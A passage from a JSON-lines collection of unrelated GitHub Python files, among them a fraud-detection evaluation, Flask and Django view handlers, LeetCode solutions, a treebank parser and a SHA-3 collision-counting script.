confusion_matrix(error_df_test.True_class, pred_y)\nplt.figure(figsize=(12, 12))\nsns.heatmap(conf_matrix, xticklabels=LABELS, yticklabels=LABELS, annot=True, fmt=\"d\")\nplt.title(\"Confusion matrix\")\nplt.ylabel('True class')\nplt.xlabel('Predicted class')\nplt.show()\n\n# opt_th=0\n# max_f1=0\n# conf_matrix=np.zeros((2, 2))\n# temp_conf_matrix=np.zeros((2, 2))\n# j = np.arange(0, 5, 0.1)\n# for i in j:\n# pred_y = [1 if e > i else 0 for e in error_df_test.Reconstruction_error.values]\n# conf_matrix = confusion_matrix(error_df_test.True_class, pred_y)\n# temp_recall = conf_matrix[1][1] / (conf_matrix[1][1] + conf_matrix[0][1])\n# temp_precision = conf_matrix[1][1] / (conf_matrix[1][1] + conf_matrix[1][0])\n# temp_f1 = 2*temp_recall*temp_precision/(temp_precision + temp_recall)\n# if temp_f1 > max_f1:\n# opt_th = i\n# max_f1 = temp_f1\n# temp_conf_matrix = conf_matrix\n#\n# conf_matrix = temp_conf_matrix\n# threshold_fixed = opt_th\n# print(threshold_fixed)\n# plt.figure(figsize=(12, 12))\n# sns.heatmap(conf_matrix, xticklabels=LABELS, yticklabels=LABELS, annot=True, fmt=\"d\")\n# plt.title(\"Confusion matrix\")\n# plt.ylabel('True class')\n# plt.xlabel('Predicted class')\n# plt.show()\n\nfalse_pos_rate, true_pos_rate, thresholds = roc_curve(error_df.True_class, error_df.Reconstruction_error)\nroc_auc = auc(false_pos_rate, true_pos_rate,)\nplt.plot(false_pos_rate, true_pos_rate, linewidth=5, label='AUC = %0.3f'% roc_auc)\nplt.plot([0, 1], [0, 1], linewidth=5)\nplt.xlim([-0.01, 1])\nplt.ylim([0, 1.01])\nplt.legend(loc='lower right')\nplt.title('Receiver operating characteristic curve (ROC)')\nplt.ylabel('True Positive Rate')\nplt.xlabel('False Positive Rate')\nplt.show()\n","repo_name":"jashrathod/Credit-Card-Fraud-Detection","sub_path":"credit_card_keras.py","file_name":"credit_card_keras.py","file_ext":"py","file_size_in_byte":7499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36905672104","text":"\"\"\"\nviews.py\n\nURL route handlers\n\nNote that any handler params must match the URL route params.\nFor example the *say_hello* handler, handling the URL route '/hello/',\n must be passed *username* as the argument.\n\n\"\"\"\nfrom google.appengine.api import users\nfrom google.appengine.runtime.apiproxy_errors 
import CapabilityDisabledError\n\nfrom flask import request, render_template, flash, url_for, redirect\n\nfrom flask_cache import Cache\n\nfrom application import app\nfrom decorators import login_required, admin_required\nfrom forms import ExampleForm\nfrom models import ExampleModel\n\n\n# Flask-Cache (configured to use App Engine Memcache API)\ncache = Cache(app)\n\n\ndef home():\n return redirect(url_for('list_examples'))\n\n\ndef say_hello(username):\n \"\"\"Contrived example to demonstrate Flask's url routing capabilities\"\"\"\n return 'Hello %s' % username\n\n\n@login_required\ndef list_examples():\n \"\"\"List all examples\"\"\"\n examples = ExampleModel.query()\n form = ExampleForm()\n if form.validate_on_submit():\n example = ExampleModel(\n example_name=form.example_name.data,\n example_description=form.example_description.data,\n added_by=users.get_current_user()\n )\n try:\n example.put()\n example_id = example.key.id()\n flash(u'Example %s successfully saved.' % example_id, 'success')\n return redirect(url_for('list_examples'))\n except CapabilityDisabledError:\n flash(u'App Engine Datastore is currently in read-only mode.', 'info')\n return redirect(url_for('list_examples'))\n return render_template('list_examples.html', examples=examples, form=form)\n\n\n@login_required\ndef edit_example(example_id):\n example = ExampleModel.get_by_id(example_id)\n form = ExampleForm(obj=example)\n if request.method == \"POST\":\n if form.validate_on_submit():\n example.example_name = form.data.get('example_name')\n example.example_description = form.data.get('example_description')\n example.put()\n flash(u'Example %s successfully saved.' % example_id, 'success')\n return redirect(url_for('list_examples'))\n return render_template('edit_example.html', example=example, form=form)\n\n\n@login_required\ndef delete_example(example_id):\n \"\"\"Delete an example object\"\"\"\n example = ExampleModel.get_by_id(example_id)\n try:\n example.key.delete()\n flash(u'Example %s successfully deleted.' 
% example_id, 'success')\n return redirect(url_for('list_examples'))\n except CapabilityDisabledError:\n flash(u'App Engine Datastore is currently in read-only mode.', 'info')\n return redirect(url_for('list_examples'))\n\n\n@admin_required\ndef admin_only():\n \"\"\"This view requires an admin account\"\"\"\n return 'Super-seekrit admin page.'\n\n\n@cache.cached(timeout=60)\ndef cached_examples():\n \"\"\"This view should be cached for 60 sec\"\"\"\n examples = ExampleModel.query()\n return render_template('list_examples_cached.html', examples=examples)\n\n\ndef warmup():\n \"\"\"App Engine warmup handler\n See http://code.google.com/appengine/docs/python/config/appconfig.html#Warming_Requests\n\n \"\"\"\n return ''\n\n","repo_name":"RobWC/dfcloud","sub_path":"oldstuff/old/application/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"818275699","text":"class Solution:\n def uniqueMorseRepresentations(self, words: List[str]) -> int:\n morse = [\".-\",\"-...\",\"-.-.\",\"-..\",\".\",\"..-.\",\"--.\",\"....\",\"..\",\".---\",\"-.-\",\".-..\",\"--\",\"-.\",\"---\",\".--.\",\"--.-\",\".-.\",\"...\",\"-\",\"..-\",\"...-\",\".--\",\"-..-\",\"-.--\",\"--..\"]\n alpha = 'abcdefghijklmnopqrstuvwxyz'\n p = []\n for word in words:\n k = ''\n for char in word:\n\t\t\t\t# This below line is for finding the index of each character in the morse list\n\t\t\t\t# we know that ASCII value of a is 97 so -97 will give us the perfect index\n k += morse[ord(char)-97]\n p.append(k)\n return len(list(set(p)))","repo_name":"ahmaddroobi99/ProblemSolving","sub_path":"unique-morse-code-words.py","file_name":"unique-morse-code-words.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"22787718207","text":"class Solution:\r\n def removeDuplicateLetters(self, s: str) -> str:\r\n #Time: O(n)\r\n #Space: O(n)\r\n #Using an array of size 26 to track and turn chars into a string doesn't work since the output has to be a subsequence of s\r\n #In terms of lexicography and greediness, keep smaller chars at the front while making sure every char has a place in the final output\r\n \r\n lastIdx = {char : idx for idx, char in enumerate(s)} #Prevent appending the last one any char's kind\r\n seen = set() #Prevent duplicates in the stack\r\n stack = [] #Monotonic - small chars at the bottom\r\n \r\n for idx, char in enumerate(s):\r\n if char in seen:\r\n continue\r\n \r\n while len(stack) and char < stack[-1] and idx < lastIdx[stack[-1]]:\r\n seen.remove(stack.pop())\r\n \r\n stack.append(char)\r\n seen.add(char)\r\n \r\n return ''.join(stack)","repo_name":"NaralC/Algorithms-Interview-Questions","sub_path":"Leetcode/Medium/0316-Remove-Duplicate-Letters.py","file_name":"0316-Remove-Duplicate-Letters.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14575097009","text":"from nnb.utils.ptb import PTBTreeNode\n\nclass PTBTokenizer:\n def __init__(self):\n self.index = 0\n self.line = None\n\n def set_line(self, line):\n self.line = line.strip()\n self.index = 0\n\n def next_token(self):\n if self.line == None:\n raise ValueError(\n \"Set a line first with Tokenizer.set_line(self,line)\"\n )\n\n while self.index < len(self.line):\n c = self.line[self.index]\n if c == ' ' or c == '\\n':\n self.index += 
1\n            continue\n        if c == '(' or c == ')':\n            self.index += 1\n            return c\n        cb = self.index\n        def is_stop_char(c):\n            return c == ')' or c == '(' or c == ' ' or c == '\\n'\n        while self.index < len(self.line) and \\\n                not is_stop_char(self.line[self.index]):\n            self.index += 1\n        return self.line[cb:self.index]\n\n        return None\n\nclass PTBParser:\n    def __init__(self, filename=None):\n        self.read_file = None\n        if filename is not None:\n            self.read_file = open(filename,'r')\n        self.t = PTBTokenizer()\n\n    def __del__(self):\n        if self.read_file is not None:\n            self.read_file.close()\n\n    def parse(self, string=None, new_tree=True):\n        if new_tree and self.read_file is not None:\n            line = self.read_file.readline()\n            self.t.set_line(line)\n            self.t.next_token()\n\n        if string is not None:\n            self.t.set_line(string)\n            self.t.next_token()\n\n        if self.read_file is None and string is None and new_tree == True:\n            raise ValueError(\n                'Parser instantiated without a file name. Either specify a ' + \\\n                'string to parse with the \"string\" parameter or instantiate' + \\\n                ' a Parser with the \"filename\" parameter'\n            )\n\n        token = self.t.next_token()\n        label = None\n        label_read = False\n        value = None\n        while token is not None:\n            if token == '(':\n                if value is None:\n                    value = [self.parse(new_tree=False)]\n                else:\n                    value += [self.parse(new_tree=False)]\n            elif token != ')':\n                if not label_read:\n                    label = token\n                    label_read = True\n                else:\n                    value = token\n            else:\n                return PTBTreeNode(label,value)\n            token = self.t.next_token()\n\n","repo_name":"NNBlocks/NNBlocks","sub_path":"nnb/utils/ptb/ptb_parser.py","file_name":"ptb_parser.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"}
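# [Editor's note -- illustrative sketch, not one of the dataset records] The PTBParser record above
# parses Penn Treebank s-expressions by recursive descent: '(' opens a child subtree, the first bare
# token becomes the node label, and ')' closes the current PTBTreeNode. A self-contained version of
# the same idea on a plain token list, using nested (label, children) tuples instead of the
# (assumed) PTBTreeNode class:
def parse_sexpr(tokens, pos=0):
    assert tokens[pos] == '('          # every subtree starts with '('
    label = tokens[pos + 1]            # first bare token is the node label
    pos += 2
    children = []
    while tokens[pos] != ')':
        if tokens[pos] == '(':
            child, pos = parse_sexpr(tokens, pos)   # recurse into a nested subtree
            children.append(child)
        else:
            children.append(tokens[pos])            # a leaf token
            pos += 1
    return (label, children), pos + 1  # skip the closing ')'

# parse_sexpr('( S ( NP dogs ) )'.split())  ->  (('S', [('NP', ['dogs'])]), 7)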
+{"seq_id":"25396870170","text":"# Given a list of numbers, determine how many elements in this list\n# are greater than both of their neighbours, and print the count of such elements.\n\n\ninputs = list(map(int, input().split()))\n\nlen_inputs = len(inputs)\nif len_inputs < 3:\n    raise ValueError(\"incorrect inputs\")\n\nleft_val = inputs[0]\nanswer = 0\nfor i in range(1, len_inputs - 1):\n    current_val = inputs[i]\n    if (current_val > left_val) and (current_val > inputs[i + 1]):\n        answer += 1\n    left_val = inputs[i]\n\nprint(answer)\n","repo_name":"Kristobal-Khunta/Algorithms","sub_path":"yandex_algo_course/week2/taskD.py","file_name":"taskD.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74860106791","text":"\"\"\"Base parser class.\"\"\"\n\n\nclass BlockParser(object):\n    \"\"\"Parser built on rules that parse blocks of input.\"\"\"\n\n    def __init__(self, rules=[]):\n        \"\"\"Create a BlockParser, pre-loading a set of rules.\"\"\"\n        self.rules = []\n        for rule in rules:\n            self.add_rule(rule)\n\n    def add_rule(self, rule):\n        \"\"\"Add a rule to this parser\"\"\"\n        self.rules.append(rule)\n\n    def parse(self, generator):\n        \"\"\"Parse an iterable source of strings into a generator.\"\"\"\n        gen = iter(generator)\n        for line in gen:\n            block = {}\n            for rule in self.rules:\n                if rule[0](line):\n                    block = rule[1](line, gen)\n                    break\n            yield block\n","repo_name":"CitrineInformatics/dftparse","sub_path":"dftparse/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"44686031645","text":"# import Asset\nimport json\n\n# This object has to match the API being used in order to make json.dumps()\n# work\nclass Stock():\n    def __init__(self, open: float, close: float, high: float, low: float, average_volume: float, market_cap: float, peratio: float, dividend_yield: float, asset_type: str, last: float, symbol: str, prev_close: float):\n        self.open = open\n        self.close = close\n        self.high = high\n        self.low = low\n        self.average_volume = average_volume\n        self.market_cap = market_cap\n        self.peratio = peratio\n        self.dividend_yield = dividend_yield\n        self.asset_type = asset_type\n        self.last = last\n        self.symbol = symbol\n        self.prevclose = prev_close\n\n\n    def to_json(self):\n        return json.dumps(self.__dict__)\n\n    @classmethod\n    def from_json(cls, json_str):\n        stockJson = json_str.get(\"quotes\").get(\"quote\")\n        print(stockJson)\n        return Stock(stockJson[\"open\"], stockJson[\"close\"], stockJson[\"high\"], stockJson[\"low\"], stockJson[\"average_volume\"], 0.0, 0.0, 0.0, stockJson[\"type\"], stockJson[\"last\"], stockJson[\"symbol\"], stockJson[\"prevclose\"])\n","repo_name":"jrgabler/stock-simulator","sub_path":"src/models/assets/Stock.py","file_name":"Stock.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
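# [Editor's note -- illustrative sketch, not one of the dataset records] The Stock model above
# serialises itself with json.dumps(self.__dict__) and rebuilds itself from a Tradier-style
# payload shaped like {"quotes": {"quote": {...}}}. A minimal round-trip illustration; every
# field value below is made up for the example:
sample_payload = {
    "quotes": {
        "quote": {
            "open": 10.0, "close": 10.5, "high": 11.0, "low": 9.8,
            "average_volume": 1_000_000, "type": "stock", "last": 10.4,
            "symbol": "ABC", "prevclose": 10.1,
        }
    }
}
# stock = Stock.from_json(sample_payload)  # market_cap/peratio/dividend_yield default to 0.0
# print(stock.to_json())                   # dumps the instance attributes back to JSON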
+{"seq_id":"10547217440","text":"from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Integer, String, Float, Boolean,Text\n\nBase = declarative_base()\n\nfrom DBHelper.session import session\nfrom DBHelper.tables.base_table import Entity\nfrom DBHelper.tables.base_table import CustomColumn\n\n\n# Monster\nclass Monster(Entity, Base):\n    \"\"\"\n    Monster\n    \"\"\"\n    __cn__ = \"怪物\"\n\n    __tablename__ = 'monster'\n    id = CustomColumn(Integer, cn=\"ID\", primary_key=True, editable=False,autoincrement=True)\n\n    name = CustomColumn(Text,cn=\"名称\",comment='')\n\n    exp_value = CustomColumn(Integer, cn='经验值', comment='被击败后掉落的经验值')\n    introduce = CustomColumn(Text, cn=\"介绍\")\n    deposit = CustomColumn(Integer, cn=\"押金\", default=0, comment='押金')\n\n    @classmethod\n    def add_or_update_by_name(cls,\n                              *,\n                              name: str,\n                              exp_value: int = None,\n                              introduce: str = None,\n                              deposit: int = None\n                              ) -> \"Monster\":\n        record = cls._add_or_update_by_name(kwargs=locals())\n        return record\n\n    @classmethod\n    def add_or_update_by_id(\n            cls,\n            *,\n            _id: int,\n\n            name: str = None,\n            exp_value: int = None,\n            introduce: str = None,\n            deposit: int = None\n    ) -> \"Monster\":\n        record = cls._add_or_update_by_id(kwargs=locals())\n        return record\n\n# Add\n","repo_name":"York1996OutLook/WorldSimplifiedTextVersion","sub_path":"DBHelper/tables/monster.py","file_name":"monster.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31538783259","text":"def resolve():\n    N = int(input())\n    P = [int(e) for e in input().split()]\n\n    i, ops = 0, 0\n    while i < N - 1:\n        if P[i] == i + 1:\n            P[i], P[i + 1] = P[i + 1], P[i]\n            ops += 1\n        i += 1\n    if P[i] == i + 1:\n        ops += 1\n    \n    print(ops)\n\n# resolve()\n# exit()\n\nimport sys\nfrom io import StringIO\nimport unittest\n\n\nclass TestClass(unittest.TestCase):\n    def assertIO(self, input, output):\n        stdout, stdin = sys.stdout, sys.stdin\n        sys.stdout, sys.stdin = StringIO(), StringIO(input)\n        resolve()\n        sys.stdout.seek(0)\n        out = sys.stdout.read()[:-1]\n        sys.stdout, sys.stdin = stdout, stdin\n        self.assertEqual(out, output)\n\n    def test_入力例_1(self):\n        input = \"\"\"5\n1 4 3 5 2\"\"\"\n        output = \"\"\"2\"\"\"\n        self.assertIO(input, output)\n\n    def test_入力例_2(self):\n        input = \"\"\"2\n1 2\"\"\"\n        output = \"\"\"1\"\"\"\n        self.assertIO(input, output)\n\n    def test_入力例_3(self):\n        input = \"\"\"2\n2 1\"\"\"\n        output = \"\"\"0\"\"\"\n        self.assertIO(input, output)\n\n    def test_入力例_4(self):\n        input = \"\"\"9\n1 2 4 9 5 8 7 3 6\"\"\"\n        output = \"\"\"3\"\"\"\n        self.assertIO(input, output)\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n\n","repo_name":"koba925/alds","sub_path":"atcoder/ABC072/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37123400704","text":"#**********************************************************************\r\n#                                                                      *\r\n#              University Of North Carolina Charlotte                  *\r\n#                                                                      *\r\n#Program:   collision analysis                                         *\r\n#Description:  This program is to analyze the collision situation with *\r\n#              various bit width sha codes                             *\r\n#\t\t\t                                                           *\r\n#File Name: collision.py                                               *\r\n#File Version: 1.0                                                     *\r\n#                                                                      *\r\n#Programmed by: Yu Liu                                                 *\r\n#                                                                      *\r\n#Input file: input.h\t\t\t\t\t\t\t\t\t\t           *\r\n#Output file:collision_shake.txt\"                                      *\r\n#**********************************************************************\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport re\r\n\r\n\r\nif __name__ == '__main__':\r\n    path=\"new_data/\"\r\n    #inputfiles=[\"output_shake_40.dat\"]\r\n    # If you select to run all the files below together, it will take around 2-3 hours\r\n    inputfiles=[\"output_shake_12.dat\",\"output_shake_16.dat\",\"output_shake_20.dat\",\"output_shake_24.dat\",\"output_shake_28.dat\",\"output_shake_32.dat\",\"output_shake_36.dat\",\"output_shake_40.dat\",\"output_shake_48.dat\",\"output_shake_56.dat\",\"output_shake_64.dat\"]\r\n    
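    # [Editor's sketch, not in the original script] The per-file duplicate counting done further
    # down with np.unique(..., return_counts=True) can equivalently be written with
    # collections.Counter; `summarize_collisions` is a hypothetical helper showing the same
    # bookkeeping for one file's lines:
    from collections import Counter
    def summarize_collisions(lines):
        counts = Counter(lines)
        collided_values = sum(1 for c in counts.values() if c >= 2)       # distinct lines that collide
        total_collisions = sum(c - 1 for c in counts.values() if c >= 2)  # extra occurrences beyond the first
        return collided_values, total_collisions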
#inputfiles=[\"output_shake_32.dat\"]\r\n\r\n\r\n    outputfile=\"collision_shake.txt\"\r\n\r\n    k=0\r\n    filename=[]\r\n    findCollision=[]\r\n    firstCollisionPosition=[]\r\n    firstCollisionData=[]\r\n    collisionList = {}\r\n    collisions = []\r\n    collidedDataNum = []\r\n    temp = []\r\n\r\n    for file in (inputfiles):\r\n        filename.append(file)\r\n        f = open(path+file, mode='r')\r\n        content = f.readlines()\r\n        f.close()\r\n\r\n        # find the first collision\r\n        j=0\r\n        temp.append(0)\r\n        firstCollisionPosition.append(0)\r\n        firstCollisionData.append('')\r\n        findCollision.append(0)  # a flag of collision\r\n        for data in content:\r\n            for pt in range(j+1,len(content)):\r\n                if content[pt]==content[j]:\r\n                    #print(\"j-%d: %s VS pt-%d: %s \"%(j,content[j],pt,content[pt])) # for debugging\r\n                    firstCollisionPosition[k]=pt # record the position of first collision\r\n                    temp[k] = j\r\n                    firstCollisionData[k]=content[pt].strip('\\n') # record the data of first collision without '\\n'\r\n                    findCollision[k]=1\r\n                    break\r\n            if findCollision[k] == 1:  # if a collision was found\r\n                break\r\n            else:\r\n                j+=1\r\n\r\n        # count the collision amount\r\n        dataWithCount= dict(zip(*np.unique(content, return_counts=True)))  # count each record's duplicate #\r\n        # print(dataWithCount)\r\n        # print(\"Collision list:\", collisionList)\r\n        collidedDataNum.append(0)\r\n        collisions.append(0) #amount of collision\r\n        for key,value in dataWithCount.items():\r\n            if value >=2:\r\n                collisionList.update({key:value-1}) #collision data\r\n                collisions[k]= collisions[k] + value - 1 #total collision in this file\r\n                collidedDataNum[k] +=1 # number of collision data in this file\r\n        k+=1\r\n        dataWithCount.clear()\r\n        print(\"%s: \" % (inputfiles[k-1]),end=\"\")\r\n        print(collisionList) # for debugging\r\n        collisionList.clear()\r\n        print(\"\\n\")\r\n        #print(count) # for debugging\r\n\r\n    # output the result\r\n    f = open(outputfile, 'w')\r\n    print(\"Data source      First collision position    Number of collided data   Total collisions    First collided data\")\r\n    f.write(\"Data source      First collision position    Number of collided data   Total collisions     First collided data\\n\")\r\n    for i in range(len(inputfiles)):\r\n        print(\"%-20s %-4d -> %-5d  %-6d  %-6d  %-64s\" %(inputfiles[i], temp[i],firstCollisionPosition[i],collidedDataNum[i],collisions[i], firstCollisionData[i]))\r\n        f.write(\"%-20s %-4d -> %-5d  %-6d  %-6d  %-64s\\n\" %(inputfiles[i], temp[i],firstCollisionPosition[i],collidedDataNum[i],collisions[i], firstCollisionData[i]))\r\n    f.close()\r\n\r\n    # plot the result\r\n    plt.rcParams['font.sans-serif']=['Comic Sans MS']\r\n\r\n    a=collisions\r\n    b=firstCollisionPosition\r\n    lx=[]\r\n    l=[i for i in range(len(inputfiles))]\r\n    for string in inputfiles:\r\n        num = re.sub(\"\\D\",\"\",string)\r\n        lx.append(num)\r\n\r\n    #print(firstCollisionPosition)\r\n    #print(collisions)\r\n\r\n    fmt='%d%%'\r\n    fig = plt.figure()\r\n    plt.title('COLLISION (with original data)') # warning\r\n    plt.xlabel(u\"SHA3 bits\", fontproperties='Comic Sans MS') # warning\r\n\r\n    ax1 = fig.add_subplot(111)\r\n    ax1.plot(l, b,'or-',label=u'First collision position')\r\n    for i,(_x,_y) in enumerate(zip(l,b)):\r\n        plt.text(_x,_y,b[i],color='black',fontsize=10,)\r\n    ax1.legend(loc=1)\r\n    ax1.set_ylim([0, 100000])\r\n    ax1.set_ylabel('First collision position')\r\n\r\n    # total collisions (bars)\r\n    ax2 = ax1.twinx()  # second axis\r\n    plt.bar(l,a,alpha=0.3,color='blue',label=u'Total collisions')\r\n    ax2.legend(loc=2)\r\n    ax2.set_ylim([0, 100000]) # y axis range\r\n    ax2.set_ylabel('Total collisions')\r\n    
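    # [Editor's note] The figure overlays two y-scales on a shared x axis (one tick per SHA3
    # output width): ax1 draws the first-collision position as a labelled line plot, while ax2,
    # created with twinx(), draws the total collision count as translucent bars.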
plt.legend(prop={'family':'Comic Sans MS','size':8},loc=\"upper left\")\r\n #ax.set_xlabel('First collision position');\r\n plt.xticks(l,lx)\r\n plt.show()","repo_name":"royliuyu/Mem-Simulation","sub_path":"simulation/hashfunction_x86_64/version1_collisionTotalAmountAnalysis/collision.py","file_name":"collision.py","file_ext":"py","file_size_in_byte":5982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6590203316","text":"import pickle\nimport numpy as np\n\ntest_dict_1 = {'message_length': 2345,\n 'additional_info': 'none'}\n\ndata_1 = pickle.dumps(test_dict_1)\nprint(data_1)\nloaded_data = pickle.loads(data_1)\nprint(loaded_data)\n\ntest_array = np.random.randn(2, 3)\nprint(\"test array:\", test_array)\ntest_dict_2 = {'data': test_array.tobytes(),\n 'data shape': [2, 3]}\nprint(test_dict_2)\ndata_2 = pickle.dumps(test_dict_2)\nloaded_data_2 = pickle.loads(data_2)\nprint(loaded_data_2)\nprint(np.frombuffer(loaded_data_2['data']))\n\ntest_array = np.random.randn(2, 3)\ntest_dict_3 = {'data': test_array,\n 'data shape': [2, 3]}\nprint(test_dict_3)\ndata_3 = pickle.dumps(test_dict_3)\nprint(\"data 3 length:\", len(data_3))\nloaded_data_3 = pickle.loads(data_3)\nprint(loaded_data_3)\n\n","repo_name":"vincentherrmann/constrastive-predictive-coding-audio","sub_path":"dreaming/data_transfer_tests.py","file_name":"data_transfer_tests.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"10151389498","text":"\"\"\"\nPowerful Digit Sum\nProject Euler Problem #56\nby Muaz Siddiqui\n\nA googol (10^100) is a massive number: one followed by one-hundred zeros; 100^100 \nis almost unimaginably large: one followed by two-hundred zeros. 
Despite their size,\n the sum of the digits in each number is only 1.\n\nConsidering natural numbers of the form a^b, where a, b < 100, what is the maximum \ndigital sum?\n\"\"\"\nfrom euler_helpers import timeit, digital_sum\n\n#brute force\n@timeit\ndef answer():\n    max_ = 0\n    for a in range(2, 100):\n        for b in range(2, 100):\n            current = digital_sum(pow(a, b))\n            if current > max_:\n                max_ = current\n    return max_","repo_name":"respectus/Euler-Problems","sub_path":"problem56.py","file_name":"problem56.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
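# [Editor's note -- illustrative sketch, not one of the dataset records] digital_sum comes from the
# author's euler_helpers module, which is not included here; it presumably just sums the decimal
# digits of an integer, along these lines:
def digital_sum(n):
    return sum(int(d) for d in str(n))

# digital_sum(2 ** 10) == 7, since 1024 -> 1 + 0 + 2 + 4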
+{"seq_id":"37010544447","text":"from rest_framework import generics, status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n# from rest_framework.permissions import IsAuthenticated\nfrom django.shortcuts import get_object_or_404\nfrom django.db.models import Q, Sum, Case, IntegerField, When\nfrom django.http import Http404\nfrom main_app.permissions import IsSetupOwner\nfrom main_app.models import BossSetup, PlayerSetup, UlalaBoss\nfrom main_app.serializers import BossSetupListSerializer, BossSetupListWithInteractionsSerializer, BossSetupListWithCommentsSerializer, BossSetupListWithInteractionsCommentsSerializer,BossSetupCreateUpdateSerializer, PlayerSetupCreateUpdateSerializer, UlalaBossSetupCountSerializer\n\nimport random\nimport urllib.parse\nfrom hashids import Hashids\nfrom decouple import config\nhashids = Hashids(salt=config(\"HASH_ID_SALT\"), min_length=16)\n\nclass BossSetupList(generics.ListAPIView):\n    def get_queryset(self):\n        queryset = BossSetup.objects.filter(status='P')\n        bossname_encoded = self.request.query_params.get('name')\n        if bossname_encoded is not None:\n            bossname = urllib.parse.unquote(bossname_encoded)\n            queryset = queryset.filter(boss__name=bossname)\n        return queryset\n    def get_serializer_class(self):\n        if self.request.user:\n            return BossSetupListWithInteractionsSerializer\n        return BossSetupListSerializer\n\nclass BossSetupListRandom(generics.ListAPIView):\n    serializer_class = BossSetupListSerializer\n    def get_queryset(self): \n        num_random_objects = int(self.request.query_params.get('size'))\n        queryset = list(BossSetup.objects.filter(status='P'))\n        return random.sample(queryset, num_random_objects)\n\nclass BossSetupCount(generics.ListAPIView):\n    serializer_class = UlalaBossSetupCountSerializer\n    def get_queryset(self):\n        queryset = UlalaBoss.objects.annotate(\n            num_setup=Sum(\n                Case(\n                    When(boss_setup__status='P', then=1), output_field=IntegerField()\n                ))).filter(num_setup__gt=0)\n        return queryset\n    \nclass BossSetupFavouriteList(generics.ListAPIView):\n    serializer_class=BossSetupListWithInteractionsSerializer\n    def get_queryset(self):\n        user = self.request.user\n        if user is not None:\n            return BossSetup.objects.filter(Q(created_by=user) | Q(saved__user=user)).distinct('id')\n\nclass BossSetupDetail(generics.RetrieveAPIView):\n    def get_object(self):\n        slug = self.kwargs['slug']\n        boss_setup_id = hashids.decode(slug)[0]\n        try:\n            obj = BossSetup.objects.get(id=boss_setup_id)\n        except BossSetup.DoesNotExist:\n            raise Http404\n        return obj\n    \n    def get_serializer_class(self):\n        with_comments = self.request.query_params.get('withComments')\n        if self.request.user:\n            if with_comments:\n                return BossSetupListWithInteractionsCommentsSerializer\n            else:\n                return BossSetupListWithInteractionsSerializer\n        else:\n            if with_comments:\n                return BossSetupListWithCommentsSerializer\n            else:\n                return BossSetupListSerializer\n    \nclass BossPlayerSetupCreate(APIView):\n    def post(self, request, format=None):\n        boss_setup_data = request.data['bossSetup']\n        player_setups = request.data['playerSetups']\n        new_boss_setup = BossSetupCreateUpdateSerializer(data=boss_setup_data)\n        if new_boss_setup.is_valid():\n            new_boss_setup.save()\n            new_boss_setup_id = new_boss_setup['id'].value\n            for i, player_setup in enumerate(player_setups):\n                player_setup_data = {}\n                player_setup_data['boss_setup'] = new_boss_setup_id\n                player_setup_data['player_class'] = player_setup['player_class']\n                for j, skill in enumerate(player_setup['skills']):\n                    player_setup_data[f'skill{j+1}'] = skill\n                for k, toy in enumerate(player_setup['toys']):\n                    player_setup_data[f'toy{k+1}'] = toy\n                new_player_setup = PlayerSetupCreateUpdateSerializer(data=player_setup_data)\n                if new_player_setup.is_valid():\n                    new_player_setup.save()\n            serializer = BossSetupListWithInteractionsSerializer(BossSetup.objects.get(pk=new_boss_setup_id), context={'request': request})\n            return Response(serializer.data, status=status.HTTP_201_CREATED, content_type='application/json')\n        return Response(new_boss_setup.errors, status=status.HTTP_400_BAD_REQUEST)  # `serializer` is only bound on the valid path\n\nclass BossPlayerSetupUpdate(APIView):\n    permission_classes = (IsSetupOwner,)\n    \n    def get_object(self):\n        slug = self.kwargs['slug']\n        boss_setup_id = hashids.decode(slug)[0]\n        obj = get_object_or_404(BossSetup.objects.all(), pk=boss_setup_id)\n        self.check_object_permissions(self.request, obj)\n        return obj\n    \n    def patch(self, request, slug, format=None):\n        boss_setup_obj = self.get_object()\n        boss_setup_data = request.data['bossSetup']\n        player_setups_data = request.data['playerSetups']\n        new_boss_setup = BossSetupCreateUpdateSerializer(boss_setup_obj, data=boss_setup_data, partial=True)\n        if new_boss_setup.is_valid():\n            new_boss_setup.save()\n            if player_setups_data:\n                current_player_setups = PlayerSetup.objects.filter(boss_setup=boss_setup_obj.id)\n                for i, player_setup_obj in enumerate(current_player_setups):\n                    player_setup_data = {}\n                    player_setup_data['player_class'] = player_setups_data[i]['player_class']\n                    for j, skill in enumerate(player_setups_data[i]['skills']):\n                        player_setup_data[f'skill{j+1}'] = skill\n                    for k, toy in enumerate(player_setups_data[i]['toys']):\n                        player_setup_data[f'toy{k+1}'] = toy\n                    new_player_setup = PlayerSetupCreateUpdateSerializer(player_setup_obj, data=player_setup_data, partial=True)\n                    if 